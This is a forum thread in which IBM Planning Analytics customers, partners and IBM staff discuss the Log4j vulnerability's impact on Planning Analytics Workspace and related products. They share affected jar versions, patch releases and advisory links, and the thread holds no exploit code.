Planning Analytics

 View Only
Expand all | Collapse all

Log4j exploit and security alert

  • 1.  Log4j exploit and security alert

    Posted Sun December 12, 2021 11:51 AM
    Hello! How is TM1 and CA effected by the recent log4j security of alert? What are IBM's plans to supply a fix? 

    FYI: https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/

    ------------------------------
    Ryan Clapp
    ------------------------------

    #PlanningAnalyticswithWatson


  • 2.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:26 AM
    Hi,

    Yes, I would like to know if IBM are aware of this and are working on a patch, as we have had a few customers raise tickets with us over the weekend about this security threat.

    Thanks
    Ian

    ------------------------------
    Ian Moy
    ------------------------------

    Original Message


  • 3.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:29 AM
    Just to add to the chorus, we've also had customers raise queries, so it would be could to get formal statements from IBM

    ------------------------------
    Steven Rowe
    ------------------------------

    Original Message


  • 4.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 05:08 AM
    I've had this back from the IBM support desk.

    Sure, this issue is still being investigated. I'm posting below official statement:

    Please be advised that we are investigating this issue at the moment and updates regarding vulnerabilities will be posted on the PSIRT website once available, We advise IBM customers to monitor the PSIRT website as further updates become available.
    https://www.ibm.com/trust/security-psirt
    https://www.ibm.com/blogs/psirt/
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
    We understood this has been identified as a Global Threat. We will keep the post you once we have update from the security development team.


    ------------------------------
    Steven Rowe
    ------------------------------

    Original Message


  • 5.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 08:20 AM
    Everything I found so far is this blog site from IBM:

    https://www.ibm.com/blogs/psirt/category/severity-critical/

    Yesterday they posted the following statement: https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
    which is saying, their currently investigating all IBM products if they are effected and updating the blog if anything has been found.

    ------------------------------
    Sebastian Klein
    ------------------------------

    Original Message


  • 6.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 09:02 AM
    Hi,

    One of our customers has apparently detected the vulnerability in Planning Analytics Workspace v2.0.63, in the following docker image file

    E:\Docker\windowsfilter\1883d7e08acf52687bd45e08f312c5c9e31ccccf1b2fce142777bf7cda1465bf\Files\pa-predict-svc\wlp\usr\servers\defaultServer\lib\global\log4j-core-2.7.jar

    They have another server that has an earlier version of workspace installed (v2.0.54) and that seems to be ok. I can't verify any of this but it's coming from a dedicated security team at a customer site with experience in security threats and attacks of this nature.

    Regards
    Ian

    ------------------------------
    Ian Moy
    ------------------------------

    Original Message


  • 7.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 10:09 AM
    Ian,

    Looking at PAW Local 2.0.70 on RHEL, I have 17 "log4j-core*.*" files of three versions: 2.11.2, 2.13.2, and 2.14.1. They are in different /var/lib/containers/storage/overlay/... subfolders. They need to be version 2.15 to contain the fix the Apache Foundation put out on Thursday.  PA 2.0.9.10 and PASS 2.0.69 seem to have only a couple log4j files, but they are older, log4j-1.2.17.jar from 2016. I believe the warning is for any log4j version before version 2.15 from Thursday, Dec 9, 2021.

    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------

    Original Message


  • 8.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 11:50 AM
    Hi Walter,

    That is pretty much the conversation I have just had with a customer. They seem to indicate to me that they could not detect any problems with the PA & PASS box but they were concerned about their PAW server.

    Even though they host servers behind their own firewall, they have decided to stop the PAW box for now and wait for IBM to post an updated about it. I guess that is their choice and they are taking the cautious approach, especially given recent issues they have had with security attacks. 

    Regards

    ------------------------------
    Ian Moy
    ------------------------------

    Original Message


  • 9.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 12:30 PM
    Yes, we also have customers who have shut their PAW servers down, would be good to have some hint of timescales from IBM.  No PAW, no TM1 these days....
    In terms of tracking if you are impacted you can look in the license files, though of course it is unknown how much effort goes into keeping the license files in sync with the product.
    For PAW ...../licenses/notices/  , in PAW v26 and PAWv70 we found licence reference to v1.2.17, v2.7 and v2.9.1

    For TM1 every trace we can see in the reference information indicates 1.2 or 1.3 releases which if before the vulnerability was released.

    Basically use notepad++ to search text files for Log4j

    What an exciting Monday!

    ------------------------------
    Steven Rowe
    ------------------------------

    Original Message


  • 10.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 03:54 AM
    Hi.

    PAW R71 has been released to address the issue:
    Security Bulletin: IBM Planning Analytics Workspace: Apache log4j Vulnerability (CVE-2021-44228)

    /Kasper

    ------------------------------
    Kasper Dueholm
    ------------------------------

    Original Message


  • 11.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 10:31 AM

    We also found references to old versions
    ...WEB-INF\lib\log4j-1.2.17.jar,Implementation-Version: 1.2.17

    This version 1.x is "End of life" since 2015. It should not have been in PAW in the first place. This has raised serious concerns with customers. Does anyone have any insights on why this old was used and is there any response from IBM to it?

    I have raised a ticket, but so far I haven't received a (satisfying) answer.



    ------------------------------
    Matthias Mazaj
    ------------------------------

    Original Message


  • 12.  RE: Log4j exploit and security alert

    Posted Mon December 13, 2021 04:29 PM
    Here is a very useful #PowerShell script which scans all local drives for presence of log4j jar files and analyzes the contents of the jar file to determine if it is vulnerable to #log4shell (CVE-2021-44228) vulnerability.
    https://twitter.com/sstranger/status/1470310778830004225

    Vaccine for said vulnerability
    https://www.bankinfosecurity.com/log4j-vaccine-released-for-exploited-apache-zero-day-a-18105

    All credit goes to respective authors...


    ------------------------------
    Allan Beals
    Principal
    Agile Sytems, LLC
    Seattle
    (425) 402-4453 x601
    ------------------------------

    Original Message


  • 13.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 08:58 AM
    Edited by System Fri January 20, 2023 04:17 PM
    In case anyone didn't get the email or see the previous post about the fix...

    IBM Planning Analytics Local
    Security bulletin: Security Bulletin: IBM Planning Analytics Workspace: Apache log4j Vulnerability (CVE-2021-44228)
    The IBM Planning Analytics Workspace component of IBM Planning Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Planning Analytics Workspace as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability.

    #PlanningAnalyticswithWatson


  • 14.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 09:07 AM
    Edited by System Fri January 20, 2023 04:28 PM
    Hi.

    Looks like PAW R71 comes with Log4j 2.15.0 which also has problems.... Not sure if this causes issues for PAW(?)

    Log4j 2.16.0 has already been released:
    **************
    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
    **************
    Source: Log4j – Apache Log4j 2

    /Kasper

    ------------------------------
    Kasper Dueholm
    ------------------------------

    Original Message


  • 15.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 09:55 AM
    Thanks for highlighting this Kasper.


    ------------------------------
    George Tonkin
    ------------------------------

    Original Message


  • 16.  RE: Log4j exploit and security alert

    Posted Wed December 15, 2021 10:36 AM
    So...what's the consensus, is PAW 71 ready as a patch for the issue or not?  Appreciate this isn't IBMs issue that the initial Apache patch wasn't complete but it would be good to get some sensible statements around the level of risk here.
    From what I understand.
    1.  If PAW is behind company firewalls, this mitigates the risk, although you could have a bad actor within your organisation.
    2.  AFAIK there is no way for end users to write to the logs, (assuming no hacks of PAW itself).  If users can't write to the logs then the risk is zero.  There's some big assumptions here though as I don't really know what the log4j is used for in PAW.  Is just "error logs" to text files?

    I guess the only sensible option is patch, given no statements about the level of risk involved for the specific product.

    We'd already started pushing 71 to customers.

    Also note that this page states that Planning Analytics is not impacted which is pretty ambiguos / misleading....
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    ------------------------------
    Steven Rowe
    ------------------------------

    Original Message


  • 17.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Wed December 15, 2021 11:08 AM
    Edited by System Fri January 20, 2023 04:25 PM

    Soufiane has commented that

    "PAW uses log4j in its default configuration. Hence, the fixes in log4j 2.16 are not needed, based on our current assessment. Nonetheless, we plan to upgrade log4j to the latest version in future releases of PAW."

    Thanks for this reassurance again @Soufiane Azizi



    ------------------------------
    George Tonkin
    ------------------------------

    Original Message


  • 18.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 04:09 AM
    Adding to the thread........I opened some tickets on this yesterday

    We've now got the advice that we need to upgrade PAW to 2.0.71, but I raised the first ticket around the conformance of the other components in the PA suite which we need to move to if moving to PAW 2.0.71

    We are using PA 2.0.9.9, so should be OK there, but since our PASS and PAfE are both 2.0.64 we'll have to move up to 2.0.69 if we are to maintain the conformance of N-2

    Has anyone run PAW release significantly higher than their other components ?

    The second ticket was raised around our Cognos Analytics release 11.1.6 IF002, which overnight I have confirmed will now need to be upgraded to 11.1.7 and detailed:
    https://www.ibm.com/support/pages/node/6526474

    The document does state "IBM is developing a "non-upgrade" option for "On Prem" customers that will patch the system and allow customers to remain on their current applicable version. This option will be announced and available shortly.".................which for us would be the preferred solution





    ------------------------------
    AJAY CHANDHOK
    ------------------------------

    Original Message


  • 19.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 07:50 AM

    We did an upgrade as well to the latest interim fix 6 for 11.1.7 and rescanned for the vulnerability afterwards. we came to the conclusion that IBM has implemented the 2.15 version of Log4j so it's still vulnerable. So be aware. We already informed IBM about this.



    ------------------------------
    Michiel Schakel
    ------------------------------

    Original Message


  • 20.  RE: Log4j exploit and security alert

    Posted Thu December 16, 2021 08:08 AM
    Hi Michiel.

    I raised that question in comment no. 13 in this thread...
    According to answer no. 16 in this thread PAW should be secure since it is using default configuration.

    But it would be nice with an official confirmation of this from IBM and not a LinkedIn comment...

    So if you hear from IBM Support please let us know :)

    ------------------------------
    Kasper Dueholm
    ------------------------------

    Original Message


  • 21.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 10:18 AM
    There has been much attention made on this issue as regards PAW however I am still unclear on the impact/remedy as regards TM1Web.  Any further insights?

    ------------------------------
    Dean Watts
    ------------------------------

    Original Message


  • 22.  RE: Log4j exploit and security alert

    IBM Champion
    Posted Fri December 17, 2021 10:29 AM

    HI Dean,

    Have a look at Soufiane's comment here.

    ", George, the current assessment of the Apache log4j Vulnerability (CVE-2021-44228) for all of Planning Analytics shows that only PAW is affected. Hence, as stated in the bulletin, the remediation for all of PA is to upgrade PAW to V2.0.71"



    ------------------------------
    George Tonkin
    ------------------------------

    Original Message


  • 23.  RE: Log4j exploit and security alert

    Posted Fri December 17, 2021 03:45 PM
    I just noticed this here:

    Update December 17, 2:20 pm
    IBM is focused on moving to Log4j Version 2.15 as quickly as possible for all applications impacted by CVE-2021-44228. Work also is underway to move to Log4j Version 2.16, for all impacted applications, but our priority right now is to move to at least Version 2.15.

    With so much active industry research on Log4j, we will continually see mitigation and remediation recommendations. We continue to review the latest information and share updates accordingly.



    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------

    Original Message


  • 24.  RE: Log4j exploit and security alert

    Posted Tue December 21, 2021 09:41 AM
    PAW 2.0.72 was put on Fix Central last night. Looks like log4j 2.17 released by the Apache foundation 12/18/2021 was incorporated. I verified 2.17 in the Linux install of PAW 2.0.72 I just did.

    Security Bulletin

    ------------------------------
    Walter Coffen
    Technology Manager
    QueBIT Consulting, LLC
    ------------------------------

    Original Message


  • 25.  RE: Log4j exploit and security alert

    Posted Tue January 18, 2022 04:20 PM
    Sorry to bring this back to the fore, but we've upgraded our entire suite of PA components to latest release and have just seen that Apache have documented a new log4j 2.17.1, right at the end of December:

    Apache 2.17.1

    This doesn't look like it's in the latest PAW 2.0.72 which is covering log4j 2.17

    Can someone confirm this is the case please and if so, is there an imminent PAW release about to the added to Fix Central for download ?

    Cheers
    Ajay

    ------------------------------
    AJAY CHANDHOK
    ------------------------------

    Original Message


  • 26.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 04:12 AM
    Edited by System Fri January 20, 2023 04:15 PM
    Hi All

    I have raised the ticket this morning with IBM, response below:

    "You are right, CVE-2021-44832 is not connected with previous Log4j vulnerability and fix for it was not included in PAW 72. CVE-2021-44832 is already reported and development team is assessing the impact on the Planning Analytics. Once they finish the assessment, corresponding bulletin will be posted via PSIRT portal.

    https://www.ibm.com/trust/security-psirt

    https://www.ibm.com/blogs/psirt/

    APAR number:

    PH43238 PLANNING ANALYTICS VULNERABILITY ASSESSMENT CVE-2021-44832

    Once the fix is ready I will let you know within this case too."



    Anyone about to upgrade may want to keep an eye out on Fix Central and the links above for updates

    Ajay



    ------------------------------
    AJAY CHANDHOK
    ------------------------------

    Original Message


  • 27.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 08:16 AM
    I can confirm the Planning Analytics Workspace 2.0.72 release uses log4j 2.17.0.  The next release (2.0.73) will update to log4j 2.17.1.

    The Planning Analytics team is paying close attention to the situation with log4j vulnerabilities.

    ------------------------------
    Stuart King
    IBM Planning Analytics Offering Manager
    ------------------------------

    Original Message


  • 28.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 09:25 AM
    Thank you for confirming Stuart.

    Do we have an estimated date for PAW 2.0.73 availability on Fix Central at this stage ?

    Ajay

    ------------------------------
    AJAY CHANDHOK
    ------------------------------

    Original Message


  • 29.  RE: Log4j exploit and security alert

    Posted Wed January 19, 2022 09:40 AM
    The ETA for the next Planning Analytics Workspace release (2.0.73) is mid February.  As always, this is just an estimate and is subject to change.

    ------------------------------
    Stuart King
    IBM Planning Analytics Offering Manager
    ------------------------------

    Original Message